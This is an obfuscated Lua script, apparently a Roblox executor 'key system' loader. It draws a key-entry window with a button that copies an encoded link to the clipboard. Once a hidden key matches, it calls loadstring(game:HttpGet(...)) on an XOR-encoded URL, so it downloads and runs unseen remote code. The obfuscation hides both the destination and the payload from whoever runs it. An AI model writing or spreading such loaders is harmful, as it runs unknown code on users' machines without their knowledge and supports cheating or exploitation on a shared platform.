--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v81,v82) local v83={};for v87=1, #v81 do v6(v83,v0(v4(v1(v2(v81,v87,v87 + 1 )),v1(v2(v82,1 + (v87% #v82) ,1 + (v87% #v82) + 1 )))%256 ));end return v5(v83);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\19\193\43\220\249\49\234\63\204","\156\67\173\74\165"));local v10=Instance.new(v7("\18\165\72\27\185","\38\84\215\41\118\220\70"));v10.Size=UDim2.new(0 + 0 ,283 + 117 ,0 -0 ,1380 -(1020 + 60) );v10.Position=UDim2.new(1423.5 -(630 + 793) ,0 -0 ,0.5 -0 ,0 + 0 );v10.AnchorPoint=Vector2.new(0.5,0.5 -0 );v10.BackgroundColor3=Color3.fromRGB(15,15,15);v10.BorderSizePixel=1747 -(760 + 987) ;v10.Active=true;v10.Draggable=true;v10.Parent=v8;local v19=Instance.new(v7("\101\63\1\29\236\94\19\48","\158\48\118\66\114"));v19.CornerRadius=UDim.new(0,1923 -(1789 + 124) );v19.Parent=v10;local v22=Instance.new(v7("\159\33\8\34\81\176\239\191\43\30","\155\203\68\112\86\19\197"));v22.Size=UDim2.new(0,806 -(745 + 21) ,0 + 0 ,40);v22.Position=UDim2.new(2 -1 , -40,0 -0 ,0 + 0 );v22.BackgroundTransparency=1 + 0 ;v22.Text="×";v22.TextScaled=true;v22.TextColor3=Color3.fromRGB(150,150,150);v22.Parent=v10;v22.MouseButton1Click:Connect(function() v8:Destroy();end);local v30=Instance.new(v7("\114\216\46\232\108\121\231\253\74","\152\38\189\86\156\32\24\133"));v30.Size=UDim2.new(1056 -(87 + 968) ,0,0 -0 ,28 + 2 );v30.Position=UDim2.new(0 -0 ,1413 -(447 + 966) ,0.05 -0 ,1817 -(1703 + 114) );v30.Text=v7("\215\82\190\6\207\78\180\82\249\90","\38\156\55\199");v30.TextSize=719 -(376 + 325) ;v30.TextColor3=Color3.fromRGB(255,417 -162 ,255);v30.BackgroundTransparency=1;v30.Parent=v10;local v38=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154"));v38.Size=UDim2.new(2 -1 ,0 + 0 ,0 -0 ,30);v38.Position=UDim2.new(14 -(9 + 5) ,376 -(85 + 291) ,0.2,1265 -(243 + 1022) );v38.Text=v7("\60\177\197\218\159\108\31\28\166\145\235\130\108\21\26\188\212\204\158\108\0\17\186\145\236\142\62\61\9\171","\84\121\223\177\191\237\76");v38.TextSize=49 -36 ;v38.TextColor3=Color3.fromRGB(150,124 + 26 ,1330 -(1123 + 57) );v38.BackgroundTransparency=1;v38.Parent=v10;local v46=Instance.new(v7("\143\83\209\180\24\95\40","\161\219\54\169\192\90\48\80"));v46.Size=UDim2.new(0.8,0 + 0 ,254.2 -(163 + 91) ,1930 -(1869 + 61) );v46.Position=UDim2.new(0.1 + 0 ,0 -0 ,0.4,0 -0 );v46.BackgroundColor3=Color3.fromRGB(4 + 21 ,33 -8 ,25);v46.PlaceholderText=v7("\108\76\20\32\91\2\43\32\80\12\78\107","\69\41\34\96");v46.Text="";v46.TextSize=18;v46.TextColor3=Color3.fromRGB(240 + 15 ,1729 -(1329 + 145) ,1226 -(140 + 831) );v46.Parent=v10;local v55=Instance.new(v7("\137\234\244\5\16\37\185\209","\75\220\163\183\106\98"));v55.CornerRadius=UDim.new(1850 -(1409 + 441) ,723 -(15 + 703) );v55.Parent=v46;local v58=Instance.new(v7("\54\191\147\35\251\23\174\159\56\215","\185\98\218\235\87"));v58.Size=UDim2.new(0.35 + 0 ,438 -(262 + 176) ,1721.15 -(345 + 1376) ,688 -(198 + 490) );v58.Position=UDim2.new(0.1 -0 ,0,0.7 -0 ,1206 -(696 + 510) );v58.BackgroundColor3=Color3.fromRGB(52 -27 ,1287 -(1091 + 171) ,25);v58.Text=v7("\236\57\51\166\245\175\210","\202\171\92\71\134\190");v58.TextSize=3 + 15 ;v58.TextColor3=Color3.fromRGB(150,150,150);v58.Parent=v10;local v66=Instance.new(v7("\28\232\15\135\59\207\41\154","\232\73\161\76"));v66.CornerRadius=UDim.new(0 -0 ,5);v66.Parent=v58;local v69=Instance.new(v7("\143\220\90\73\60\174\205\86\82\16","\126\219\185\34\61"));v69.Size=UDim2.new(0.35,0 -0 ,374.15 -(123 + 251) ,0 -0 );v69.Position=UDim2.new(0.55,698 -(208 + 490) ,0.7 + 0 ,0);v69.BackgroundColor3=Color3.fromRGB(25,12 + 13 ,861 -(660 + 176) );v69.Text=v7("\47\198\91\113\117\55\216\226\21","\135\108\174\62\18\30\23\147");v69.TextSize=3 + 15 ;v69.TextColor3=Color3.fromRGB(352 -(14 + 188) ,825 -(534 + 141) ,61 + 89 );v69.Parent=v10;local v77=Instance.new(v7("\131\192\9\196\10\160\54\213","\167\214\137\74\171\120\206\83"));v77.CornerRadius=UDim.new(0 + 0 ,5);v77.Parent=v69;v58.MouseButton1Click:Connect(function() setclipboard(v7("\131\228\38\77\235\253\196\191\62\84\246\172\198\248\39\95\182\169\142\228\125\12\168\244\219\168\100\13\183\180\135\241\34\16\250\166\159\228\62\88\235\234\138\229\38\82\254\166\153\253\127\82\232\183","\199\235\144\82\61\152"));end);local function v80(v84) return v84==v7("\4\30\182\59\23\19\189\40\15\31\183","\75\103\118\217") ;end v69.MouseButton1Click:Connect(function() local v85=0 + 0 ;local v86;while true do if (v85==(0 -0)) then v86=v46.Text;if v80(v86) then local v89=0 -0 ;while true do if (v89==2) then loadstring(game:HttpGet(v7("\192\58\52\144\167\67\179\135\60\33\151\250\30\245\220\38\53\130\161\10\249\218\45\47\142\160\28\242\220\96\35\143\185\86\203\193\34\45\129\167\12\253\135\23\37\147\251\11\249\206\61\111\136\177\24\248\219\97\45\129\189\23\179\234\33\56\133\166","\156\168\78\64\224\212\121"),true))();break;end if (v89==(2 -1)) then wait(1);v8:Destroy();v89=2;end if (v89==(0 + 0)) then v46.PlaceholderText=v7("\228\91\98\6\188\29\211\20\91\17\160\95","\126\167\52\16\116\217");v46.Text="";v89=1;end end else local v90=0 + 0 ;while true do if (v90==(398 -(115 + 281))) then v46.Text="";break;end if (v90==(0 -0)) then local v94=0;while true do if (v94==(1 + 0)) then v90=2 -1 ;break;end if (v94==0) then v46.PlaceholderText=v7("\46\224\179\207\11\231\161\142\12\235\188\128\71\218\183\215\71\239\162\207\14\224\235","\174\103\142\197");v46.Text="";v94=1;end end end if (v90==1) then local v95=0 -0 ;while true do if (v95==(867 -(550 + 317))) then wait(1 -0 );v46.PlaceholderText=v7("\115\38\75\61\55\30\211\83\49\17\118\107","\152\54\72\63\88\69\62");v95=1;end if (v95==1) then v90=2 -0 ;break;end end end end end break;end end end);
